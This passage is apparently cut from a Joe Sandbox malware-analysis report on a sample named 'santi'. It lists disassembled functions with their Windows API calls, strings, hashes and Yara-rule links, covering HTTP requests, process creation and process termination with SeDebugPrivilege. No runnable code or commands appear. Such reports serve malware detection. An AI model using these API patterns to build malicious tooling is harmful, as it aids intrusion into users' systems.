                                                                  • Part of subcall function 002FB63C: GetCursorPos.USER32(000000FF), ref: 002FB64F
                                                                  • Part of subcall function 002FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 002FB66C
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000001), ref: 002FB691
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000002), ref: 002FB69F
                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0034ED3C
                                                                • ImageList_EndDrag.COMCTL32 ref: 0034ED42
                                                                • ReleaseCapture.USER32 ref: 0034ED48
                                                                • SetWindowTextW.USER32(?,00000000), ref: 0034EDF0
                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0034EE03
                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0034EEDC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                • API String ID: 1924731296-2107944366
                                                                • Opcode ID: cf4dd6738b18280dca757ae38c0eb87d53cf6473abad785587884efcecb93063
                                                                • Instruction ID: 8e4bc8e87c3ddc7be3ba8a20c33757d7bf5ca595bf8eaa44b0a4b2d38d0c668d
                                                                • Opcode Fuzzy Hash: cf4dd6738b18280dca757ae38c0eb87d53cf6473abad785587884efcecb93063
                                                                • Instruction Fuzzy Hash: 7C51BA30204304AFD712DF24DC96FAA77E8FB88304F44492DF9959A2E2CBB0A954CF52
                                                                Function 003345C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003345FF
                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0033462B
                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0033466D
                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00334682
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0033468F
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003346BF
                                                                • InternetCloseHandle.WININET(00000000), ref: 00334706
                                                                  • Part of subcall function 00335052: GetLastError.KERNEL32(?,?,003343CC,00000000,00000000,00000001), ref: 00335067
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                • String ID:
                                                                • API String ID: 1241431887-3916222277
                                                                • Opcode ID: b4bc381b00854b6efdb8e048c14fe214911ad7186718e162884384d0631d6046
                                                                • Instruction ID: 5535901b57e0a8c3258d458a5d70632da9f8ec29f9aa0995dcc5b8cc6fe97255
                                                                • Opcode Fuzzy Hash: b4bc381b00854b6efdb8e048c14fe214911ad7186718e162884384d0631d6046
                                                                • Instruction Fuzzy Hash: 444180B1A01609BFEB079F50CC8AFBB77ACFF09304F008116FA159A151D7B0AD448BA5
                                                                Function 0033B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0037DC00), ref: 0033B715
                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0037DC00), ref: 0033B749
                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0033B8C1
                                                                • SysFreeString.OLEAUT32(?), ref: 0033B8EB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                • String ID:
                                                                • API String ID: 560350794-0
                                                                • Opcode ID: 141afe3fe8a9d5402cef747eaf4b6ae521a2c600c1b6ebae3e495dae110ec845
                                                                • Instruction ID: eeb29f4138b8f7f75f05064d1ec970d8d7c2b40ab51fabf31265c058e5549615
                                                                • Opcode Fuzzy Hash: 141afe3fe8a9d5402cef747eaf4b6ae521a2c600c1b6ebae3e495dae110ec845
                                                                • Instruction Fuzzy Hash: 6EF14D75A00209EFCF05DF94C888EAEB7B9FF89315F118459FA05AB250DB71AE45CB50
                                                                Function 003424D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 003424F5
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00342688
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003426AC
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003426EC
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034270E
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0034286F
                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003428A1
                                                                • CloseHandle.KERNEL32(?), ref: 003428D0
                                                                • CloseHandle.KERNEL32(?), ref: 00342947
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                • String ID:
                                                                • API String ID: 4090791747-0
                                                                • Opcode ID: 639fd52436171000f7f41058f429215f2c1e0e8d0d94413b92f41f5dbcca20d4
                                                                • Instruction ID: 3191b850c77d606f11c13943bc1f60cb9da69e9666b4721b9c100acffdd1a3a1
                                                                • Opcode Fuzzy Hash: 639fd52436171000f7f41058f429215f2c1e0e8d0d94413b92f41f5dbcca20d4
                                                                • Instruction Fuzzy Hash: C5D19D35604240DFCB16EF25C891A6EBBE5AF85310F55846DF989AF2A2DB31EC40CF52
                                                                Function 0034B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0034B3F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InvalidateRect
                                                                • String ID:
                                                                • API String ID: 634782764-0
                                                                • Opcode ID: 7b9232992221154bd6280a74d6e1bcbc221da362234b2f1ecc3c1578418febed
                                                                • Instruction ID: d7db552ae12b6a358fbbb5e398ee5fff0640f929403e2c827c80abf149df094a
                                                                • Opcode Fuzzy Hash: 7b9232992221154bd6280a74d6e1bcbc221da362234b2f1ecc3c1578418febed
                                                                • Instruction Fuzzy Hash: 9051C134600204BBEF279F2ACC85BADFBE8AB05754F644015FA15DE6E2C771F9508B50
                                                                Function 002FA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0035DB1B
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0035DB3C
                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0035DB51
                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0035DB6E
                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0035DB95
                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0035DBA0
                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0035DBBD
                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0035DBC8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                • String ID:
                                                                • API String ID: 1268354404-0
                                                                • Opcode ID: 43e47c49400ee45bda058175c0ebb922ce9c299793f2a72dcfc3ba8d58032bcf
                                                                • Instruction ID: 84230ca395b1d09de42d3fdea717243cb33e41c72cb6b4b8dc52767032f0a8bb
                                                                • Opcode Fuzzy Hash: 43e47c49400ee45bda058175c0ebb922ce9c299793f2a72dcfc3ba8d58032bcf
                                                                • Instruction Fuzzy Hash: 95518E70610209EFDB21DF65CC81FAAB7B9AB08790F114528FA0AD72A0D7B0AC90DB50
                                                                Function 00327555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00325FA6,?), ref: 00326ED8
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00325FA6,?), ref: 00326EF1
                                                                  • Part of subcall function 003272CB: GetFileAttributesW.KERNEL32(?,00326019), ref: 003272CC
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 003275CA
                                                                • _wcscmp.LIBCMT ref: 003275E2
                                                                • MoveFileW.KERNEL32(?,?), ref: 003275FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                • String ID:
                                                                • API String ID: 793581249-0
                                                                • Opcode ID: e7b613efe61f0484b92a87c99003367c093ed2aa98c66a07b3fc3812340efa88
                                                                • Instruction ID: ff8454c6ab2d6b7a38293496d95f937410df1abc8c8543ea9a02727dac4a732b
                                                                • Opcode Fuzzy Hash: e7b613efe61f0484b92a87c99003367c093ed2aa98c66a07b3fc3812340efa88
                                                                • Instruction Fuzzy Hash: AB5150B2A092299ADF66EB94E851DDE73BCAF08310F1040AAF605E7541EB7097C5CF64
                                                                Function 002FEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 002FEAEB
                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 002FEB32
                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 0035DC86
                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0035DAD1,00000004,00000000,00000000), ref: 0035DCF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
                                                                • Opcode ID: 592ef02b9346008dbc9981d8584e838ff1e04febbd31d0e1d0e421ab0287c109
                                                                • Instruction ID: 5613dbcdc3833eeeed98339168abc10694a5a8a331c95bd461f32f95de4f1e69
                                                                • Opcode Fuzzy Hash: 592ef02b9346008dbc9981d8584e838ff1e04febbd31d0e1d0e421ab0287c109
                                                                • Instruction Fuzzy Hash: FB412670638289DADF374F28CD8CE3AFA99BB52349F1B4429E34786971C6B0A850D711
                                                                Function 0031B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0031AEF1,00000B00,?,?), ref: 0031B26C
                                                                • HeapAlloc.KERNEL32(00000000,?,0031AEF1,00000B00,?,?), ref: 0031B273
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0031AEF1,00000B00,?,?), ref: 0031B288
                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0031AEF1,00000B00,?,?), ref: 0031B290
                                                                • DuplicateHandle.KERNEL32(00000000,?,0031AEF1,00000B00,?,?), ref: 0031B293
                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0031AEF1,00000B00,?,?), ref: 0031B2A3
                                                                • GetCurrentProcess.KERNEL32(0031AEF1,00000000,?,0031AEF1,00000B00,?,?), ref: 0031B2AB
                                                                • DuplicateHandle.KERNEL32(00000000,?,0031AEF1,00000B00,?,?), ref: 0031B2AE
                                                                • CreateThread.KERNEL32(00000000,00000000,0031B2D4,00000000,00000000,00000000), ref: 0031B2C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                • String ID:
                                                                • API String ID: 1957940570-0
                                                                • Opcode ID: eae9d0447e4539026c055fb5bdd29abf4b3c66408a32c5955557101a056c7cc5
                                                                • Instruction ID: 8a21b7da3ed7062eb2c3d9aea0c61c0c9fd440bc53c372eb8509ef5f6975c935
                                                                • Opcode Fuzzy Hash: eae9d0447e4539026c055fb5bdd29abf4b3c66408a32c5955557101a056c7cc5
                                                                • Instruction Fuzzy Hash: B101F6B5740348BFE711AFA5DC49FAB7BACEB89700F118411FA04CB2A1CAB09800CB21
                                                                Function 0033C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                • API String ID: 0-572801152
                                                                • Opcode ID: 1ff92fcd3c94a14845207eba7d8391b847643a7e3543c85c172d0a0e0ec72baa
                                                                • Instruction ID: 63c4ce1dd2f2c84a3427e6fe20d92f7caf65111d4e98f3c171a6e0b4e6e55fb7
                                                                • Opcode Fuzzy Hash: 1ff92fcd3c94a14845207eba7d8391b847643a7e3543c85c172d0a0e0ec72baa
                                                                • Instruction Fuzzy Hash: 2AE1D071A10219AFDF16DFA8D8C1AEEB7B9EF48310F159029F905BB281D770AD41CB90
                                                                Function 003316DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                • _wcstok.LIBCMT ref: 0033184E
                                                                • _wcscpy.LIBCMT ref: 003318DD
                                                                • _memset.LIBCMT ref: 00331910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                • String ID: X$p29l29
                                                                • API String ID: 774024439-1984664996
                                                                • Opcode ID: 826664d1c4dca599653c1c158703e3757c3e2bb1e8c9f1e6cf9584c630dd544e
                                                                • Instruction ID: 7a16e6620a9ad93541095a5c8588e9d8c192b4bcc7ce206dcb47e5ebb148a50e
                                                                • Opcode Fuzzy Hash: 826664d1c4dca599653c1c158703e3757c3e2bb1e8c9f1e6cf9584c630dd544e
                                                                • Instruction Fuzzy Hash: 1CC1AF356143809FC725EF24C891A9EB7E4BF85354F40492DF98A9B2A2DB30EC15CF82
                                                                Function 00349A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00349B19
                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00349B2D
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00349B47
                                                                • _wcscat.LIBCMT ref: 00349BA2
                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00349BB9
                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00349BE7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window_wcscat
                                                                • String ID: SysListView32
                                                                • API String ID: 307300125-78025650
                                                                • Opcode ID: 2107ad1a6c0bb421cd6c1ab3f4312e594fba3ccbf8747d6d94478ab36bc722aa
                                                                • Instruction ID: 4127687358b7c55bc01fd9deb6efe77f517e8cc034acf0572f1c5922d853744b
                                                                • Opcode Fuzzy Hash: 2107ad1a6c0bb421cd6c1ab3f4312e594fba3ccbf8747d6d94478ab36bc722aa
                                                                • Instruction Fuzzy Hash: CC417271A40308AFDB229F64DC85BEB77E8EF08350F11452AF545EB291D671AD85CB60
                                                                Function 0034172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00326532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00326554
                                                                  • Part of subcall function 00326532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00326564
                                                                  • Part of subcall function 00326532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003265F9
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034179A
                                                                • GetLastError.KERNEL32 ref: 003417AD
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003417D9
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00341855
                                                                • GetLastError.KERNEL32(00000000), ref: 00341860
                                                                • CloseHandle.KERNEL32(00000000), ref: 00341895
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 2533919879-2896544425
                                                                • Opcode ID: 7c1061813b2cbabf99bccda95f8270dfbe67359ca9a11ef3f6815f3162c0a711
                                                                • Instruction ID: 4f9c019c4961611e656cf6de90ef54976e9aae9485f83eb6a47eb73a3e5fbc2b
                                                                • Opcode Fuzzy Hash: 7c1061813b2cbabf99bccda95f8270dfbe67359ca9a11ef3f6815f3162c0a711
                                                                • Instruction Fuzzy Hash: 5941CF71700600AFDB16EF54C895FAEB7E5AF44700F068059FA069F2C2DBB4A944CF91
                                                                Function 00325819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadIconW.USER32(00000000,00007F03), ref: 003258B8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconLoad
                                                                • String ID: blank$info$question$stop$warning
                                                                • API String ID: 2457776203-404129466
                                                                • Opcode ID: 187ec6a476d67cd98fee02d6d84eb5f7939ff8bdd756f8b649c98532c2cdd0f7
                                                                • Instruction ID: e35124c6f0893f4fa7e21f304fae09b70665292cc5379664d3978c919e52c9d1
                                                                • Opcode Fuzzy Hash: 187ec6a476d67cd98fee02d6d84eb5f7939ff8bdd756f8b649c98532c2cdd0f7
                                                                • Instruction Fuzzy Hash: 6A110D7670E757BAEB075B54BC92DAA379C9F16710F20003AF510F52C1E7F0AB004265
                                                                Function 0032A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                Download Yara Rule
                                                                APIs
